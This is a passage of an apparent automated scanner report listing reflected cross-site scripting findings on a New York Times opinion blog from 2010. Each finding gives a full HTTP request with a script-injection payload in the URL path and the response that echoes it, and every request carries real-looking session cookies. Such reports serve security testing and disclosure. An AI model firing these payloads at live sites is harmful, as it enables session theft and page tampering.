Host:	http://opinionator.blogs.nytimes.com
Path:	/category/the-score/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3e96"><script>alert(1)</script>9854a6a0f5e was submitted in the REST URL parameter 3. This input was echoed as a3e96\"><script>alert(1)</script>9854a6a0f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-score/pagea3e96"><script>alert(1)</script>9854a6a0f5e/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:30:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:30:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-score/pagea3e96\"><script>alert(1)</script>9854a6a0f5e/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.230. http://opinionator.blogs.nytimes.com/category/the-stone [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/the-stone

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f72a2"><script>alert(1)</script>b9e42893e2 was submitted in the REST URL parameter 2. This input was echoed as f72a2\"><script>alert(1)</script>b9e42893e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-stonef72a2"><script>alert(1)</script>b9e42893e2 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:31:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:31:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-stonef72a2\"><script>alert(1)</script>b9e42893e2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.231. http://opinionator.blogs.nytimes.com/category/the-stone/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/the-stone/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51ef1"><script>alert(1)</script>84210864ce9 was submitted in the REST URL parameter 2. This input was echoed as 51ef1\"><script>alert(1)</script>84210864ce9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-stone51ef1"><script>alert(1)</script>84210864ce9/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:32:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:32:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-stone51ef1\"><script>alert(1)</script>84210864ce9&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.232. http://opinionator.blogs.nytimes.com/category/the-stone/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/the-stone/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10b0d"><script>alert(1)</script>b5580bee2 was submitted in the REST URL parameter 3. This input was echoed as 10b0d\"><script>alert(1)</script>b5580bee2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-stone/feed10b0d"><script>alert(1)</script>b5580bee2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:27:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:27:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-stone/feed10b0d\"><script>alert(1)</script>b5580bee2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.233. http://opinionator.blogs.nytimes.com/category/the-stone/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/the-stone/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ccb5"><script>alert(1)</script>1a1a652616f was submitted in the REST URL parameter 3. This input was echoed as 1ccb5\"><script>alert(1)</script>1a1a652616f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-stone/page1ccb5"><script>alert(1)</script>1a1a652616f/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:31:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:31:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-stone/page1ccb5\"><script>alert(1)</script>1a1a652616f/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.234. http://opinionator.blogs.nytimes.com/category/the-thread [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/the-thread

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae4b"><script>alert(1)</script>c23f40df9ac was submitted in the REST URL parameter 2. This input was echoed as 7ae4b\"><script>alert(1)</script>c23f40df9ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-thread7ae4b"><script>alert(1)</script>c23f40df9ac HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:32:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:32:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-thread7ae4b\"><script>alert(1)</script>c23f40df9ac&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.235. http://opinionator.blogs.nytimes.com/category/the-thread/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/the-thread/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9594"><script>alert(1)</script>20b13b2f18a was submitted in the REST URL parameter 2. This input was echoed as e9594\"><script>alert(1)</script>20b13b2f18a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-threade9594"><script>alert(1)</script>20b13b2f18a/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:32:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:32:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-threade9594\"><script>alert(1)</script>20b13b2f18a&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.236. http://opinionator.blogs.nytimes.com/category/the-thread/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/the-thread/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 653ab"><script>alert(1)</script>85b47746a21 was submitted in the REST URL parameter 3. This input was echoed as 653ab\"><script>alert(1)</script>85b47746a21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-thread/feed653ab"><script>alert(1)</script>85b47746a21/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:28:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:28:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-thread/feed653ab\"><script>alert(1)</script>85b47746a21&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.237. http://opinionator.blogs.nytimes.com/category/the-thread/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/the-thread/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69d3f"><script>alert(1)</script>9c9a593d0ef was submitted in the REST URL parameter 3. This input was echoed as 69d3f\"><script>alert(1)</script>9c9a593d0ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-thread/page69d3f"><script>alert(1)</script>9c9a593d0ef/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:33:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:33:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-thread/page69d3f\"><script>alert(1)</script>9c9a593d0ef/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.238. http://opinionator.blogs.nytimes.com/category/timothy-egan [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/timothy-egan

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ecde"><script>alert(1)</script>ad46de21bb2 was submitted in the REST URL parameter 2. This input was echoed as 6ecde\"><script>alert(1)</script>ad46de21bb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/timothy-egan6ecde"><script>alert(1)</script>ad46de21bb2 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:18:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:18:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
